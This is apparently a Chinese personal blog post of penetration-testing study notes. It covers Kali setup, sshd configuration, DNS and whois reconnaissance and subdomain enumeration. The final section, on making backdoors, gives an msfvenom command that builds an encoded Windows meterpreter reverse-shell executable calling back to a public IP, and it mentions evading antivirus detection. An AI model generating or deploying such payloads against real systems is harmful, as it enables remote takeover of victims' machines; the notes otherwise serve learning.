<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="渗透测试学习过程梳理–20220514Section 1 渗透测试系统安装一、.kali系统安装1.1kali渗透测试系统简介Kali Linux是基于Debian的Linux发行版， 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写Bac">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2022/06/21/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="渗透测试学习过程梳理–20220514Section 1 渗透测试系统安装一、.kali系统安装1.1kali渗透测试系统简介Kali Linux是基于Debian的Linux发行版， 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写Bac">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220514100518890.png">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220514114100415.png">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220514114306649.png">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220603155009987.png">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220603155657146.png">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220604073640372.png">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220604073802835.png">
<meta property="og:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220604083158137.png">
<meta property="article:published_time" content="2022-06-20T17:55:54.434Z">
<meta property="article:modified_time" content="2022-06-07T23:42:03.694Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/Thaygo/AppData/Roaming/Typora/typora-user-images/image-20220514100518890.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-渗透测试" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/06/21/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="article-date">
  <time class="dt-published" datetime="2022-06-20T17:55:54.434Z" itemprop="datePublished">2022-06-21</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <hr>
<hr>
<h1 id="渗透测试学习过程梳理–20220514"><a href="#渗透测试学习过程梳理–20220514" class="headerlink" title="渗透测试学习过程梳理–20220514"></a>渗透测试学习过程梳理–20220514</h1><h2 id="Section-1-渗透测试系统安装"><a href="#Section-1-渗透测试系统安装" class="headerlink" title="Section 1 渗透测试系统安装"></a>Section 1 渗透测试系统安装</h2><h3 id="一、-kali系统安装"><a href="#一、-kali系统安装" class="headerlink" title="一、.kali系统安装"></a>一、.kali系统安装</h3><h4 id="1-1kali渗透测试系统简介"><a href="#1-1kali渗透测试系统简介" class="headerlink" title="1.1kali渗透测试系统简介"></a>1.1kali渗透测试系统简介</h4><p><strong>Kali Linux是基于<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/Debian/748667">Debian</a>的<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/Linux/27050">Linux</a>发行版， 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成，BackTrack是他们之前写的用于取证的Linux发行版 。</strong></p>
<p><strong>Kali Linux</strong>预装了许多渗透测试软件，包括nmap 、Wireshark 、John the Ripper，以及Aircrack-ng.用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有<strong>32位****和</strong>64位*<em><strong>的镜像。可用于x86 指令集。同时还有基于</strong>ARM架构的镜像</em>*，可用于树莓派和三星的ARM Chromebook</p>
<p>kali支持多平台。windows,linux,mobiles 以及live boot(USB disk) 等</p>
<h4 id="1-2使用VM创建kali虚拟机"><a href="#1-2使用VM创建kali虚拟机" class="headerlink" title="1.2使用VM创建kali虚拟机"></a>1.2使用VM创建kali虚拟机</h4><p>下载kali官方镜像文件：<a target="_blank" rel="noopener" href="http://www.kali.org/">www.kali.org</a> 国外网站，下载速度很慢</p>
<p>下载方式分成两种http和ftp</p>
<p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220514100518890.png" alt="image-20220514100518890"></p>
<h4 id="1-3配置apt安装源地址"><a href="#1-3配置apt安装源地址" class="headerlink" title="1.3配置apt安装源地址"></a>1.3配置apt安装源地址</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vi /etc/apt/sources.list</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"># 官方源</span><br><span class="line"># deb http://http.kali.org/kali kali-rolling main non-free contrib</span><br><span class="line"># deb-src http://http.kali.org/kali kali-rolling main non-free contrib</span><br><span class="line">#根据需要自己选一个，中科大的还可以</span><br><span class="line">#中科大</span><br><span class="line">deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib</span><br><span class="line">deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib</span><br><span class="line">#阿里云</span><br><span class="line">#deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib</span><br><span class="line">#deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib</span><br><span class="line">#清华大学</span><br><span class="line">#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free</span><br><span class="line">#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free</span><br><span class="line">#浙大</span><br><span class="line">#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free</span><br><span class="line">#deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free</span><br><span class="line">#东软大学</span><br><span class="line">#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib</span><br><span class="line">#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib</span><br><span class="line">#重庆大学</span><br><span class="line">#deb http://http.kali.org/kali kali-rolling main non-free contrib</span><br><span class="line">#deb-src http://http.kali.org/kali kali-rolling main non-free contrib</span><br></pre></td></tr></table></figure>



<h3 id="二、配置网络和服务"><a href="#二、配置网络和服务" class="headerlink" title="二、配置网络和服务"></a>二、配置网络和服务</h3><h4 id="2-1配置静态IP"><a href="#2-1配置静态IP" class="headerlink" title="2.1配置静态IP"></a>2.1配置静态IP</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#修改配置文件</span><br><span class="line">vi /etc/network/interfaces</span><br><span class="line">#修改完成,重启网络服务</span><br><span class="line">systemctl restart networking</span><br></pre></td></tr></table></figure>



<h4 id="2-2配置临时ip的方法"><a href="#2-2配置临时ip的方法" class="headerlink" title="2.2配置临时ip的方法"></a>2.2配置临时ip的方法</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ifconfig eth0 ip</span><br></pre></td></tr></table></figure>

<h4 id="2-3vm-nat配置网络地址"><a href="#2-3vm-nat配置网络地址" class="headerlink" title="2.3vm nat配置网络地址"></a>2.3vm nat配置网络地址</h4><p>打开网络编辑器，查看nat网卡的net配置，根据配置，修改配置文件&#x2F;etc&#x2F;network&#x2F;interfaces</p>
<p>重启网络</p>
<h4 id="2-4打开sshd服务"><a href="#2-4打开sshd服务" class="headerlink" title="2.4打开sshd服务"></a>2.4打开sshd服务</h4><p>修改sshd配置文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vi /etc/ssh/sshd_config</span><br></pre></td></tr></table></figure>

<p>注：将PermitRootLogin 改为yes表示允许root用户登陆</p>
<p>prohibit-password 改为no 不允许密码登陆</p>
<p>PubkeyAuthentication 改为yes，表示开启公钥验证，开启此项，允许xshell使用私钥登陆</p>
<p>配置完成，重启sshd服务,并设置开机自启动</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">systemctl restart sshd</span><br><span class="line">systemctl enable sshd</span><br></pre></td></tr></table></figure>





<h2 id="Section-2-目标信息收集"><a href="#Section-2-目标信息收集" class="headerlink" title="Section 2 目标信息收集"></a>Section 2 目标信息收集</h2><h3 id="三、被动信息收集"><a href="#三、被动信息收集" class="headerlink" title="三、被动信息收集"></a>三、被动信息收集</h3><h4 id="3-1信息收集概述"><a href="#3-1信息收集概述" class="headerlink" title="3.1信息收集概述"></a>3.1信息收集概述</h4><p>信息收集分成两种：被动信息收集和主动信息收集</p>
<p><strong>被动信息收集原理</strong>：利用第三方服务对目标进行被访问了解，防止被发现，隐蔽性高，比如：google搜索</p>
<p><strong>主动信息收集</strong>：通过直接访问，扫描网站，这种将流量直接流经网站的方式。比如：nmap扫描</p>
<h5 id="3-1-1信息收集内容"><a href="#3-1-1信息收集内容" class="headerlink" title="3.1.1信息收集内容"></a>3.1.1信息收集内容</h5><p>ip:</p>
<p>域名信息</p>
<p>邮件地址</p>
<p>文档图片数据</p>
<p>公司地址</p>
<p>公司组织架构</p>
<p>联系电话&#x2F;传真方式</p>
<p>人员姓名&#x2F;职务</p>
<p>目标系统使用的组织架构</p>
<p>公开的商业信息</p>
<p>DNS解析原理–收集网站域名解析记录</p>
<h5 id="3-1-2信息用途"><a href="#3-1-2信息用途" class="headerlink" title="3.1.2信息用途"></a>3.1.2信息用途</h5><p>1、信息描述目标</p>
<p>2、发现目标</p>
<p>3、社会工程学攻击</p>
<p>4、物理缺口</p>
<h4 id="3-2信息收集–DNS"><a href="#3-2信息收集–DNS" class="headerlink" title="3.2信息收集–DNS"></a>3.2信息收集–DNS</h4><h5 id="3-2-1域名解析原理"><a href="#3-2-1域名解析原理" class="headerlink" title="3.2.1域名解析原理"></a>3.2.1域名解析原理</h5><p><strong>1.DNS概述</strong></p>
<p><strong>域名系统</strong>（英文：<strong>D</strong>omain <strong>N</strong>ame <strong>S</strong>ystem，<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E7%BC%A9%E5%86%99/1948062">缩写</a>：<strong>DNS</strong>）是<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E4%BA%92%E8%81%94%E7%BD%91/199186">互联网</a>的一项服务。它作为将<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E5%9F%9F%E5%90%8D/86062">域名</a>和<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/IP%E5%9C%B0%E5%9D%80/150859">IP地址</a>相互<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E6%98%A0%E5%B0%84/20402620">映射</a>的一个<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E5%88%86%E5%B8%83%E5%BC%8F%E6%95%B0%E6%8D%AE%E5%BA%93/1238109">分布式数据库</a>，能够使人更方便地访问互联网。DNS使用<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/UDP/571511">UDP</a><a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E7%AB%AF%E5%8F%A3/103505">端口</a>53。当前，对于每一级域名长度的限制是63个字符，域名总长度则不能超过253个字符。</p>
<p><strong>2.域名记录：A，Cname,NS,MX,PTR</strong></p>
<p><strong>A)</strong>	A(Address)记录 正向解析</p>
<p>A记录是将一个域名和一个ip关联起来，这也是大多数客户端默认的查询类型</p>
<p>名称:    baidu.com<br>Addresses:  220.181.38.148<br>          220.181.38.251</p>
<p><strong>PTR)</strong>	PTR记录(Pointer)反向解析</p>
<p>PTR将一个ip地址对应到主机名，这些记录保存在ip-addr.arpa中</p>
<p><strong>Cname)</strong> 记录别名（Canonical Name）</p>
<p>别名记录，也称规范名字，允许将多个名字映射到同一个ip地址</p>
<p>例如： <a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a> 对应ip 8.9.9.6 web.baidu.com也对应ip 8.9.9.6</p>
<p><strong>MX）</strong> MX记录（Mail eXhange）</p>
<p>MX记录是邮件交换记录，它指向一个邮件服务器，用于电子邮件系统发送电子邮件时根据 收信人的地址后缀来定位邮件服务器</p>
<p>例如： mail.ustc.edu.cn</p>
<p><strong>NS)</strong>	NS记录(Name Server)</p>
<p>NS记录是域名服务器记录，也称授权服务器，用来指定该域名由哪个域名服务器来解析</p>
<p>登陆 <a target="_blank" rel="noopener" href="http://wanwang.aliyun.com/">http://wanwang.aliyun.com</a> 花50元&#x2F;年，买域名绑定到你的云主机上</p>
<p><strong>DNS缓存服务器</strong>：不负责解析域，只保存域名解析记录</p>
<p><strong>域名解析流程解析</strong></p>
<p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220514114100415.png" alt="image-20220514114100415"></p>
<p>解析过程描述如下：</p>
<p><img src="C:\Users\Thaygo\AppData\Roaming\Typora\typora-user-images\image-20220514114306649.png" alt="image-20220514114306649"></p>
<h5 id="3-2-2-DNS信息收集–NSLOOKUP"><a href="#3-2-2-DNS信息收集–NSLOOKUP" class="headerlink" title="3.2.2 DNS信息收集–NSLOOKUP"></a>3.2.2 DNS信息收集–NSLOOKUP</h5><p>1.ping</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping baidu.com -c 1</span><br></pre></td></tr></table></figure>

<p>2.nslookup</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">─# nslookup baidu.com</span><br><span class="line">Server:		192.168.1.1</span><br><span class="line">Address:	192.168.1.1#53</span><br><span class="line"></span><br><span class="line">Non-authoritative answer:</span><br><span class="line">Name:	baidu.com</span><br><span class="line">Address: 220.181.38.148</span><br><span class="line">Name:	baidu.com</span><br><span class="line">Address: 220.181.38.251</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>3.3.3DNS信息收集 –DIG</p>
<p>语法： dig [options] 域名</p>
<p>查询A记录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">─# dig baidu.com</span><br><span class="line"></span><br><span class="line">; &lt;&lt;&gt;&gt; DiG 9.18.0-2-Debian &lt;&lt;&gt;&gt; baidu.com</span><br><span class="line">;; global options: +cmd</span><br><span class="line">;; Got answer:</span><br><span class="line">;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 31424</span><br><span class="line">;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1</span><br><span class="line"></span><br><span class="line">;; OPT PSEUDOSECTION:</span><br><span class="line">; EDNS: version: 0, flags:; udp: 4096</span><br><span class="line">;; QUESTION SECTION:</span><br><span class="line">;baidu.com.			IN	A</span><br><span class="line"></span><br><span class="line">;; ANSWER SECTION:</span><br><span class="line">baidu.com.		300	IN	A	220.181.38.251</span><br><span class="line">baidu.com.		300	IN	A	220.181.38.148</span><br><span class="line"></span><br><span class="line">;; Query time: 0 msec</span><br><span class="line">;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)</span><br><span class="line">;; WHEN: Sat May 14 03:52:57 UTC 2022</span><br><span class="line">;; MSG SIZE  rcvd: 70</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>指定域名服务器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">└─# dig @114.114.114.114 baidu.com</span><br><span class="line"></span><br><span class="line">; &lt;&lt;&gt;&gt; DiG 9.18.0-2-Debian &lt;&lt;&gt;&gt; @114.114.114.114 baidu.com</span><br><span class="line">; (1 server found)</span><br><span class="line">;; global options: +cmd</span><br><span class="line">;; Got answer:</span><br><span class="line">;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 38786</span><br><span class="line">;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1</span><br><span class="line"></span><br><span class="line">;; OPT PSEUDOSECTION:</span><br><span class="line">; EDNS: version: 0, flags:; udp: 4096</span><br><span class="line">;; QUESTION SECTION:</span><br><span class="line">;baidu.com.			IN	A</span><br><span class="line"></span><br><span class="line">;; ANSWER SECTION:</span><br><span class="line">baidu.com.		222	IN	A	220.181.38.251</span><br><span class="line">baidu.com.		222	IN	A	220.181.38.148</span><br><span class="line"></span><br><span class="line">;; Query time: 3 msec</span><br><span class="line">;; SERVER: 114.114.114.114#53(114.114.114.114) (UDP)</span><br><span class="line">;; WHEN: Sat May 14 03:53:57 UTC 2022</span><br><span class="line">;; MSG SIZE  rcvd: 70</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>查询所有记录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dig @114.114.114.114 ustc.edu.cn any</span><br></pre></td></tr></table></figure>

<p>注：如果使用内网可能会查询失败，需要使用公网主机查询</p>
<p>PTR反向解析查询</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">─# dig -x 114.114.114.114</span><br><span class="line"></span><br><span class="line">; &lt;&lt;&gt;&gt; DiG 9.18.0-2-Debian &lt;&lt;&gt;&gt; -x 114.114.114.114</span><br><span class="line">;; global options: +cmd</span><br><span class="line">;; Got answer:</span><br><span class="line">;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 58424</span><br><span class="line">;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1</span><br><span class="line"></span><br><span class="line">;; OPT PSEUDOSECTION:</span><br><span class="line">; EDNS: version: 0, flags:; udp: 4096</span><br><span class="line">;; QUESTION SECTION:</span><br><span class="line">;114.114.114.114.in-addr.arpa.	IN	PTR</span><br><span class="line"></span><br><span class="line">;; ANSWER SECTION:</span><br><span class="line">114.114.114.114.in-addr.arpa. 300 IN	PTR	public1.114dns.com.</span><br><span class="line"></span><br><span class="line">;; Query time: 3 msec</span><br><span class="line">;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)</span><br><span class="line">;; WHEN: Sat May 14 04:00:23 UTC 2022</span><br><span class="line">;; MSG SIZE  rcvd: 89</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h5 id="3-3-3查找DNS服务器的bind版本信息"><a href="#3-3-3查找DNS服务器的bind版本信息" class="headerlink" title="3.3.3查找DNS服务器的bind版本信息"></a>3.3.3查找DNS服务器的bind版本信息</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dig text chaos VERSION.BIND @ns3.dnsv4.com</span><br></pre></td></tr></table></figure>

<p>@后面跟上要查询的dns服务器的域名</p>
<p>查询的目的是通过服务器的版本信息，去网上查找dns的漏洞</p>
<h5 id="3-3-4网站域名的域名注册信息和备案信息"><a href="#3-3-4网站域名的域名注册信息和备案信息" class="headerlink" title="3.3.4网站域名的域名注册信息和备案信息"></a>3.3.4网站域名的域名注册信息和备案信息</h5><p><strong>1）网站注册信息通过whois命令查询和web接口查询</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">whois ustc.edu.cn</span><br><span class="line"># whois zte.com.cn</span><br><span class="line">Domain Name: zte.com.cn</span><br><span class="line">ROID: 20021209s10011s00000536-cn</span><br><span class="line">Domain Status: ok</span><br><span class="line">Registrant: 中兴通讯股份有限公司</span><br><span class="line">Registrant Contact Email: shi.chaoran@zte.com.cn</span><br><span class="line">Sponsoring Registrar: 广东互易网络知识产权有限公司</span><br><span class="line">Name Server: cns1.zdnscloud.net</span><br><span class="line">Name Server: dns1.zdnscloud.info</span><br><span class="line">Name Server: ins1.zdnscloud.com</span><br><span class="line">Name Server: vns1.zdnscloud.biz</span><br><span class="line">Registration Time: 1998-12-28 00:00:00</span><br><span class="line">Expiration Time: 2023-12-28 00:00:00</span><br><span class="line">DNSSEC: unsigned</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>web接口查询</strong></p>
<p>注册信息举例两个</p>
<p>阿里云：<a target="_blank" rel="noopener" href="http://whois.aliyun.com/">http://whois.aliyun.com</a></p>
<p>站长之家：<a target="_blank" rel="noopener" href="http://whois.chinaz.com/">http://whois.chinaz.com</a></p>
<p><strong>2）备案信息查询：</strong></p>
<p>a.web接口查询：</p>
<p><a target="_blank" rel="noopener" href="http://www.beianbeian.com/">http://www.beianbeian.com/</a></p>
<p><a target="_blank" rel="noopener" href="http://icp.chinaz.com/">http://icp.chinaz.com/</a></p>
<p><a target="_blank" rel="noopener" href="http://beian.miit.gov.cn/">http://beian.miit.gov.cn/</a></p>
<p>b.天眼查</p>
<p><a target="_blank" rel="noopener" href="http://www.tianyancha.com/">http://www.tianyancha.com/</a></p>
<h4 id="3-3Meltago子域名信息查询"><a href="#3-3Meltago子域名信息查询" class="headerlink" title="3.3Meltago子域名信息查询"></a>3.3Meltago子域名信息查询</h4><p>该工具的特点是分析通过互联网访问的数据之间的真实关系，其中包括足迹互联网基础设施和收集拥有该网络的人员的组织的数据，通过使用OSINT(开源情报)技术，通过查询whois记录，社交网络，DNS记录，不同的在线API，提取元数据和搜索引擎来搜索这些数据间的连接，该工具将提供广泛的图形布局结果，允许对数据进行聚类，使关系准确和即时！</p>
<h5 id="3-3-1子域名介绍"><a href="#3-3-1子域名介绍" class="headerlink" title="3.3.1子域名介绍"></a>3.3.1子域名介绍</h5><p>顶级域名是域名的最后一节，比如<a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a> 顶级域名是.com，大小写视为相同。加上前面部分即为子域名</p>
<p><strong>常见的顶级域名分成两类</strong></p>
<p>a)通用顶级<strong>类别域名</strong>共有6个，包括用于科研机构的.ac，用于工企金融机构的.com，用于教育机构的.edu，用于政府部门的.gov，用于互联网信息中心和运行中心的.net，用于非盈利机构的.org </p>
<p>b)国家<strong>地区顶级域</strong>，比如：.cn代表中国 .jp代表日本 .uk代表英国等，地区顶级域一般由各个国家和地区负责管理</p>
<h5 id="3-3-2挖掘子域名的重要性"><a href="#3-3-2挖掘子域名的重要性" class="headerlink" title="3.3.2挖掘子域名的重要性"></a>3.3.2挖掘子域名的重要性</h5><p>子域名是某个主域的二级或者多级子域，在防御措施严密的情况下无法拿下主域，可以通过迂回战术拿下子域，然后无限靠近主域</p>
<p>子域名挖掘工具：</p>
<p>​		1.meltago 子域名挖掘工具</p>
<p>​		2.搜索引擎挖掘，如在google中输入：site:qq.com</p>
<p>​		3.第三方网站查询，比如:<a target="_blank" rel="noopener" href="http://tool.chinaz.com/subdomain">http://tool.chinaz.com/subdomain</a> 以及 <a target="_blank" rel="noopener" href="http://dnsdumpster.com/">http://dnsdumpster.com/</a></p>
<p>​		4.证书透明度公开日志枚举：<a target="_blank" rel="noopener" href="https://crt.sh/">https://crt.sh/</a> 以及 <a target="_blank" rel="noopener" href="http://censys.io/">http://censys.io/</a></p>
<p>​		5.其他途径，<a target="_blank" rel="noopener" href="http://phpinfo.me/domain">http://phpinfo.me/domain</a> 以及 <a target="_blank" rel="noopener" href="http://aizhan.com/">http://aizhan.com/</a></p>
<h5 id="3-3-3-maltego子域名挖掘"><a href="#3-3-3-maltego子域名挖掘" class="headerlink" title="3.3.3 maltego子域名挖掘"></a>3.3.3 maltego子域名挖掘</h5><p>翻墙，Maltego注册地址：<a target="_blank" rel="noopener" href="https://www.maltego.com/ce-registration/">https://www.maltego.com/ce-registration/</a></p>
<h2 id="Section-3基础协议攻击"><a href="#Section-3基础协议攻击" class="headerlink" title="Section 3基础协议攻击"></a>Section 3基础协议攻击</h2><p>五、基于各种协议收集信息</p>
<p>5.1.3基于ssh协议收集信息</p>
<p>扫描ssh版本 模块 ssh_version</p>
<p>ssh登陆模块 ssh_login</p>
<h2 id="Section-4-后门程序制作"><a href="#Section-4-后门程序制作" class="headerlink" title="Section 4 后门程序制作"></a>Section 4 后门程序制作</h2><h3 id="part-0-制作windows恶意软件来获取shell"><a href="#part-0-制作windows恶意软件来获取shell" class="headerlink" title="part 0 制作windows恶意软件来获取shell"></a>part 0 制作windows恶意软件来获取shell</h3><h4 id="branch-1使用一个编码器编码-（易被查杀）"><a href="#branch-1使用一个编码器编码-（易被查杀）" class="headerlink" title="branch 1使用一个编码器编码 （易被查杀）"></a>branch 1使用一个编码器编码 （易被查杀）</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=175.178.254.75 LPORT=4444 -b &quot;\x00&quot; -e x86/shikata_ga_nai -i 10 -f exe -o /root/curl</span><br><span class="line">1.exe</span><br></pre></td></tr></table></figure>

<p><strong>branch 1.1使用两个编码器组合编码 （不一定比一个编码器更安全）</strong></p>
